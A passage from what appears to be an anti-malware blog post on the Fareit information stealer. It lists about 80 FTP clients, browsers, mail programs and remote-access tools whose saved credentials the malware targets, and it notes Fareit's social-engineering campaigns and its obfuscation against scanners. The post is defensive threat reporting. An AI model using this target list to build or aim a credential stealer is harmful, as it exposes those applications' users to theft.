  • CoreFTP
  • FTP Explorer
  • Frigate3 FTP
  • SecureFX 6.6
  • UltraFXP 1.7
  • FTPRush 2.1.4, 2.1.5
  • WebSitePublisher 2.1.5
  • BitKinex 3.2.3
  • ExpanDrive 1.8.4
  • ClassicFTP 2.14
  • Fling 2.23
  • SoftX 3.3
  • Directory Opus 9.5.6.0.3937 (64-bit)
  • CoffeeCup FreeFTP 4.3 / DirectFTP
  • LeapFTP 2.6.2.470, 3.1.0.50
  • WinSCP 4.3.2 (Build 1201)
  • 32bit FTP 11.07.01
  • NetDrive 1.2.0.4
  • WebDrive 9.16 (build 2385) 64-bit
  • FTP Control 4.5.0.0
  • Opera 6.x - 11.x
  • WiseFTP 1.x - 7.x
  • FTP Voyager 11.x-15.x
  • Mozilla Firefox 0.x-5.x
  • Mozilla Firefox FireFTP addon
  • Mozilla SeaMonkey 1.x-2.x
  • Mozilla Flock 1.x-2.x
  • Mozilla Suite Browser 1.x
  • LeechFTP 1.3
  • Odin Secure FTP Expert
  • WinFTP
  • FTP Surfer 1.0.7
  • FTPGetter 3
  • ALFTP 5
  • IE 4-9
  • Dreamweaver CS5
  • DeluxeFTP 6
  • Google Chrome
  • Chromium & SRWare Iron
  • ChromePlus
  • Bromium (Yandex Chrome)
  • Nichrome
  • Comodo Dragon
  • RockMelt
  • K-Meleon
  • Epic
  • StaffFTP
  • AceFTP 3
  • Global Downloader
  • FreshFTP
  • BlazeFTP
  • NetFile
  • GoFTP
  • 3D-FTP
  • EasyFTP
  • XFTP
  • RDP (Windows Remote Desktop Connections)
  • FTP Now
  • Robo-FTP
  • Certificate Grabber
  • LinasFTP
  • Cyberduck
  • Putty (Russian version)
  • Notepad++ (NppFTP plugin)
  • CoffeeCup Visual Site Designer
  • FTPShell
  • FTPInfo
  • NexusFile
  • FastStone Browser
  • CoolNovo
  • WinZip (built-in FTP backup settings)
  • Yandex.Internet
  • MyFTP
  • sherrod FTP
  • NovaFTP
  • Common Windows Mail decryption code
  • Windows Live Mail
  • Windows Mail
  • Becky!
  • Pocomail
  • IncrediMail
  • The Bat!
  • Outlook
  • Thunderbird
  • FastTrackFTP


Fareit has been around, as I recall 2 years now probably stealing the same stored credentials. And now targeting clients of Bank of America using the same old technique, Social Engineering. Hopefully, authors of these applications make modifications to securely store user's credentials.
Fareit gets behind scanners by shape shifting its looks for every variant. Using different techniques, like code obfuscation and encryption, to cover the real code beneath.

Read More
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)
volute-glacial
volute-glacial
 volute-glacial
volute-glacial
Copyright © Anti-Malware Laboratory | Powered by Blogger
Design by Fabthemes | Blogger Template by NewBloggerThemes.com